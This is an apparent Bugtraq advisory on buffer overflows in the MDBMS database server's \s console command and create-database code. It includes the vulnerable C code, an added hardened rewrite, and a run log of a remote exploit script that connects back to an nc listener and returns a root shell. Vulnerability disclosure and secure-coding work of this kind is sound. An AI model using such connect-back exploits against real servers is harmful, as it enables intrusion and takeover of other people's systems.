Dear bugtraq readers,
MDBMS is a SQL database server (currently) for UNIX systems.
Versions 0.99b9 and below contain an exploitable buffer
overflow in the handling of the \s console command.
When a user passes large buffers to the server in the form
of multiple lines, these are appended to each other. A
subsequent call to the \s command then causes the overflow.
Below is faulty code (from interface.cc):
    void user::uprintf(char *s, ...)
    {
      char b[1];                 /* 1-byte stack buffer; vsprintf below writes the
                                    whole formatted string here with no bounds check */
      int len=strlen(outbuf), newlen;
      va_list ap;
      va_start(ap,s);
      vsprintf(b,s,ap);          /* the overflow: anything longer than one byte
                                    (plus NUL) runs off the end of b */
      va_end(ap);
      newlen=strlen(b);
      /* outbuf is grown correctly here, but only after b has already been overrun */
      while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
      strcat(outbuf,b);
      FD_SET(fd,parent->wmask);
    }
mu-b also found a buffer overflow in the create-database
code. This one was caused by a sprintf that generated the
name of the management variable. It has been fixed: table
and database names can now be no larger than 128 bytes.
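Both bugs above are the same mistake: formatting attacker-controlled
text with sprintf/vsprintf into a buffer whose size was fixed before
the length of the input was known. The following is an added example
(our own illustration, not MDBMS code) of how uprintf and the
management-variable naming can be written so that neither the stack
buffer nor the name buffer can be overrun. The struct conn, the
safe_uprintf/mgmt_var_name names and the "mgmt_" prefix are assumptions
made for the example; the 1000-byte growth step, the 10-byte headroom
and the 128-byte name limit come from the advisory and the faulty code.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for the per-connection state MDBMS keeps in its `user`
 * object (hypothetical struct, not the project's own definition). */
struct conn {
    char *outbuf;     /* NUL-terminated pending output for this client */
    size_t outsize;   /* bytes allocated for outbuf */
};

/* Allocate the initial output buffer (same 1000-byte step as the original). */
int conn_init(struct conn *c)
{
    c->outsize = 1000;
    c->outbuf = malloc(c->outsize);
    if (!c->outbuf) return -1;
    c->outbuf[0] = '\0';
    return 0;
}

void conn_free(struct conn *c)
{
    free(c->outbuf);
    c->outbuf = NULL;
    c->outsize = 0;
}

/* Hardened replacement for user::uprintf.  Instead of formatting into a
 * fixed stack buffer with vsprintf, measure the formatted length with
 * vsnprintf(NULL, 0, ...), grow outbuf until it has room, and format
 * directly into its tail.  Returns bytes appended, or -1 on error. */
int safe_uprintf(struct conn *c, const char *fmt, ...)
{
    va_list ap, ap2;
    size_t len = strlen(c->outbuf);
    int need;

    va_start(ap, fmt);
    va_copy(ap2, ap);                 /* ap is consumed by the sizing call */
    need = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    if (need < 0) { va_end(ap2); return -1; }

    /* Keep the original's 10-byte headroom and 1000-byte growth step. */
    while (len + (size_t)need + 10 >= c->outsize) {
        size_t newsize = c->outsize + 1000;
        char *p = realloc(c->outbuf, newsize);
        if (!p) { va_end(ap2); return -1; }
        c->outbuf = p;
        c->outsize = newsize;
    }

    vsnprintf(c->outbuf + len, c->outsize - len, fmt, ap2);
    va_end(ap2);
    return need;
}

#define MAX_NAME 128   /* limit the fix imposes on table/database names */

/* Builds a management-variable name for a database or table.  The "mgmt_"
 * prefix is assumed for illustration; the point is the explicit length
 * check plus a bounded snprintf whose return value is verified.  Returns
 * 0 on success, -1 if the name is too long or the result would not fit. */
int mgmt_var_name(char *dst, size_t dstsz, const char *name)
{
    int n;
    if (strlen(name) > MAX_NAME) return -1;
    n = snprintf(dst, dstsz, "mgmt_%s", name);
    if (n < 0 || (size_t)n >= dstsz) return -1;   /* truncated: reject it */
    return 0;
}

int main(void)
{
    struct conn c;
    char big[8001];            /* constructed input: 8000 'A's, far beyond char b[1] */
    char name[64];

    memset(big, 'A', 8000);
    big[8000] = '\0';
    if (conn_init(&c) != 0) return 1;
    safe_uprintf(&c, "status: %s\n", big);
    safe_uprintf(&c, "%d rows\n", 42);
    printf("appended %zu bytes, outbuf grown to %zu\n", strlen(c.outbuf), c.outsize);
    printf("name ok: %d\n", mgmt_var_name(name, sizeof name, "customers"));
    conn_free(&c);
    return 0;
}
```

The sizing call plus va_copy is the idiomatic C99 way to format an
argument list whose length is unknown; without va_copy the second
vsnprintf would reuse a consumed va_list, which is undefined behaviour.
Rejecting a truncated snprintf result, rather than silently clipping the
name, matters because a clipped management-variable name would otherwise
alias another database's or table's variable.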
Information about the overflows was sent to [EMAIL PROTECTED]
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
We would like to thank Marty for his kind response and quick update.
Exploit example:
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS <= 0.99b
-- [EMAIL PROTECTED] - Copyright (c) 2001
Usage: ./mdbms-pms.pl -t hostname -b back
-t hostname: hostname to test
-b back: connect back to ip
-p port: port (default: 2223)
-d delay : delay before timeout
-o offset : offset
-h : return to heap
[teleh0r@localhost mdbms]$ nc -l -v -p 1337
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS <= 0.99b
-- [EMAIL PROTECTED] - Copyright (c) 2001
- Connected to: 127.1 / MDBMS V0.99b9 ready.
- Address : 0x302027d / xor-mask: 0x2020202
- Return : 0x80cfe76 / using the heap ...
- Sending payload: ...
- * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
Exploit code attached.
Sincerely yours,
teleh0r and mu-b
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
[Attachment: mdbms.tar.gz]